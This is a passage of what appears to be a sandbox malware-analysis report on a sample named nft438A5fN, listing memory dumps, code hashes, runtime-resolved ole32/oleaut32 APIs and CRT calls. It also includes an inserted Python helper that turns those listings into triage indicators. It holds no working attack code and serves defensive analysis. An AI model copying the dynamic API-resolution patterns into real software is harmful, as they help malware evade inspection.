                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                                      • Instruction ID: 8ce3b1b7e76373cecae9566aeeffda26e4761cfba2aeba004fb12fc872e7da61
                                                                      • Opcode Fuzzy Hash: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                                      • Instruction Fuzzy Hash: 8432BF71608745ABC72ACF28C48076AB7E9BF84318F044A2DF8958B381DB75DD45CBDA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                                      • Instruction ID: 99a60b9800eac54f3d9c0a40350d22a88e7386614455f77d260c71d1aaa6fc5c
                                                                      • Opcode Fuzzy Hash: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                                      • Instruction Fuzzy Hash: 57B1B462A0435076CA04B774EC75AFE37AADFA1708F40091EE446677D5EE649E08CAB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                      • Instruction ID: df69b70191aa56f9aed6aa4cc1e6cdd2ddcd83003e539b97ef6732a7f24ebd87
                                                                      • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                      • Instruction Fuzzy Hash: A8B138312106099FD715CF28C48AB657BA1FF45369F298659E8DADF3A1C336ED81CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                      • Instruction ID: 884d056e8f4504be64bf128eafcf52a4f08c172ed66588792479ff0212af9379
                                                                      • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                      • Instruction Fuzzy Hash: 906169B1600B3456DF3A4A28F8987BE63A9EF42708FC4091ADC82DB380D7D1DD41CB55
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                      • Instruction ID: 1ad7ddbedc6bb3afbb8721eba5433941621ab3356179789b46ca6b4e0f52ccdd
                                                                      • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                      • Instruction Fuzzy Hash: B261577120473596DE368928B8D47BE6395DF41268FC00419EC87DB380DBD9ED46CB66
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                                      • Instruction ID: 46b82e3cfd26d857b8ae685646a3ff524336c6c56b1cef7771bc6567c78c2c07
                                                                      • Opcode Fuzzy Hash: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                                      • Instruction Fuzzy Hash: E1614B32A083459FC305DB24D881A5BB7E5EFD8714F450A2DF49996650EB31EE088A92
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                      • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                      • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                      • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction ID: 158fc0bed478757dc426cc3e986e746d663d3c9b4cbdffebad349dbe767dddef
                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction Fuzzy Hash: BE115B772001C28FD6148B6ED8B46B6E796EFC522972D437AD0424BF79DF22D941D900
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C9D29D
                                                                        • Part of subcall function 02C9D268: GetProcAddress.KERNEL32(00000000), ref: 02C9D281
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                      • API String ID: 1646373207-1918263038
                                                                      • Opcode ID: d66333bbfe9721035f6c1e2468a8a8b9bfeab26bf19c038265c3b3fdbf10d57a
                                                                      • Instruction ID: fdd8de92cae8658a9598b244eb4f2f0a84a6398a162ca8079aa0f2d245d74a9a
                                                                      • Opcode Fuzzy Hash: d66333bbfe9721035f6c1e2468a8a8b9bfeab26bf19c038265c3b3fdbf10d57a
                                                                      • Instruction Fuzzy Hash: 2D4121F1A883486B6E087B6D7508427F7DED348B143E0851BF407ABB91DA30FC539A29
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02CA6EDE
                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02CA6EEF
                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02CA6EFF
                                                                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02CA6F0F
                                                                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02CA6F1F
                                                                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02CA6F2F
                                                                      • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02CA6F3F
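The two "APIs" listings above show the sample resolving oleaut32.dll and ole32.dll exports at runtime through GetModuleHandleA followed by GetProcAddress, rather than through the PE import table. Joe Sandbox prints the handle argument as 00000000 because it is not a static constant, so the DLL a given GetProcAddress targets has to be inferred from the preceding GetModuleHandleA in the same function. The following is an added triage helper, not code from Joe Sandbox or from the sample: it parses listing lines of exactly this shape into (DLL, export) pairs, pairing each GetProcAddress with the most recent GetModuleHandleA by listing order (that pairing rule is an assumption), and emits "dll!Export" indicators that can be diffed against the static import directory. The sample input is the page's own lines, copied in as a string.

```python
import re
from collections import defaultdict

# Constructed sample input: the two "APIs" listings from this report, copied
# verbatim so the parser runs offline without the sandbox.
REPORT_API_LINES = """
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C9D29D
  • Part of subcall function 02C9D268: GetProcAddress.KERNEL32(00000000), ref: 02C9D281
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02CA6EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02CA6EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02CA6EFF
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02CA6F0F
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02CA6F1F
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02CA6F2F
• GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02CA6F3F
"""

# One listing entry: <Api>.<MODULE>(<args>), ref: <hex address>
API_RE = re.compile(
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_calls(text):
    """Return (api, module, [args], ref) tuples in listing order."""
    calls = []
    for m in API_RE.finditer(text):
        args = [a.strip() for a in m.group("args").split(",") if a.strip()]
        calls.append((m.group("api"), m.group("module"), args, m.group("ref").upper()))
    return calls


def resolved_exports(text):
    """Attribute each GetProcAddress to a DLL.

    Assumption: the handle passed to GetProcAddress comes from the most recent
    GetModuleHandleA in the listing (the sandbox prints it as 00000000).
    Returns (resolved, unresolved): resolved maps dll -> [export names];
    unresolved counts GetProcAddress calls whose name argument was not a
    literal the sandbox could print (e.g. the oleaut32 subcall above).
    """
    resolved = defaultdict(list)
    unresolved = defaultdict(int)
    current_dll = None
    for api, module, args, ref in parse_api_calls(text):
        if api == "GetModuleHandleA" and args:
            current_dll = args[0].lower()
        elif api == "GetProcAddress":
            names = args[1:]  # args[0] is the handle placeholder
            if names:
                resolved[current_dll].extend(names)
            else:
                unresolved[current_dll] += 1
    return dict(resolved), dict(unresolved)


def import_style_indicators(text):
    """Flatten the resolved map into sorted 'dll!Export' strings.

    Exports resolved at runtime but absent from the PE import directory are
    the ones worth a second look when hunting for dynamic API resolution.
    """
    resolved, _ = resolved_exports(text)
    return sorted(f"{dll}!{name}" for dll, names in resolved.items() for name in names)


if __name__ == "__main__":
    resolved, unresolved = resolved_exports(REPORT_API_LINES)
    for dll, names in resolved.items():
        print(f"{dll}: {len(names)} named exports resolved at runtime")
    for dll, count in unresolved.items():
        print(f"{dll}: {count} GetProcAddress call(s) with a non-literal name")
    for ind in import_style_indicators(REPORT_API_LINES):
        print(ind)
```

Run over the two listings, the helper reports six named ole32.dll exports and one oleaut32.dll lookup whose name the sandbox could not print; the named export list in the "String ID" field of the oleaut32 function (VarAdd, VarCmp, VariantChangeTypeEx and so on) is where those names actually live, since that lookup runs in a loop over a string table rather than with literal arguments.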
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                      • API String ID: 667068680-2233174745
                                                                      • Opcode ID: 07fd71996d840803233d4578bdba2360a0298101801c5317ef3b5c2563c153c3
                                                                      • Instruction ID: 889fa93e0ebd72a4bdced7dfa748cd15bca2d801482f4e0755fa09c7cf66c46f
                                                                      • Opcode Fuzzy Hash: 07fd71996d840803233d4578bdba2360a0298101801c5317ef3b5c2563c153c3
                                                                      • Instruction Fuzzy Hash: 50F0C0F2AC83827DBF01BBB05CD9B662F5DA721B0C7782D35B80355582E77694109F10
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: _free$___from_strstr_to_strchr_wcschr
                                                                      • String ID:
                                                                      • API String ID: 1963305004-0
                                                                      • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                      • Instruction ID: 0744667f265a300589cbae3d049b259cef1a165b17007bccecfacb49b54f6d64
                                                                      • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                      • Instruction Fuzzy Hash: BED1D571904714ABDF25AF789D48B7A7BAEEF01314F04816AE94597380E77ADD40CBE0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                      • Instruction ID: 0d0261e3b39cf80e5eb2297b9034f34085733d648ab883d24416061c3364001b
                                                                      • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                      • Instruction Fuzzy Hash: E9B16B71900359ABDF21DF68C880BAEBBF6EF09304F54406AE899A7351D7B59C45CB70
                                                                      APIs
                                                                      • _free.LIBCMT ref: 02D6890F
                                                                      • ___free_lconv_mon.LIBCMT ref: 02D6891A
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B2F
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B41
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B53
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B65
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B77
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B89
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67B9B
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BAD
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BBF
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BD1
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BE3
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67BF5
                                                                        • Part of subcall function 02D67B12: _free.LIBCMT ref: 02D67C07
                                                                      • _free.LIBCMT ref: 02D68931
                                                                      • _free.LIBCMT ref: 02D68946
                                                                      • _free.LIBCMT ref: 02D68951
                                                                      • _free.LIBCMT ref: 02D68973
                                                                      • _free.LIBCMT ref: 02D68986
                                                                      • _free.LIBCMT ref: 02D68994
                                                                      • _free.LIBCMT ref: 02D6899F
                                                                      • _free.LIBCMT ref: 02D689D7
                                                                      • _free.LIBCMT ref: 02D689DE
                                                                      • _free.LIBCMT ref: 02D689FB
                                                                      • _free.LIBCMT ref: 02D68A13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: _free$___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 3658870901-0
                                                                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                      • Instruction ID: 8b080d10a0580409dbaf4324cc968ec68221f8e499853cf5d96991be208618e2
                                                                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                      • Instruction Fuzzy Hash: C7313A31604315AFEF20AF78D84CB6AB7EAEF01314F50881AE858D6350DB72AD44DB21
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                      • Instruction ID: 2c8f84822aff72aef8f79dc0355ff8121654ec1f8a718e3f0c3fceb6bb90d6a5
                                                                      • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                      • Instruction Fuzzy Hash: B7C10072940209AFEB20DBA8DC85FEEB7A9EB09744F144155FA48FB381D674AD418B70
                                                                      APIs
                                                                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02C928CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                      • API String ID: 2030045667-32948583
                                                                      • Opcode ID: a203385aea133ab775cc5aae9f9ed7b91cdea0c2996a6570743643b9ed6d372a
                                                                      • Instruction ID: d8e1a71591f4510d0e459cddc3da1b44edfb38380cb2622db7caef378df06862
                                                                      • Opcode Fuzzy Hash: a203385aea133ab775cc5aae9f9ed7b91cdea0c2996a6570743643b9ed6d372a
                                                                      • Instruction Fuzzy Hash: 95A1E430A04254AFDF21AA2CCC88BD9B6E5EF49750F1440E5DDC9AB385CB758A85CF92
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D28439
                                                                      • int.LIBCPMT ref: 02D2844C
                                                                        • Part of subcall function 02D2568C: std::_Lockit::_Lockit.LIBCPMT ref: 02D2569D
                                                                        • Part of subcall function 02D2568C: std::_Lockit::~_Lockit.LIBCPMT ref: 02D256B7
                                                                      • std::_Facet_Register.LIBCPMT ref: 02D2848C
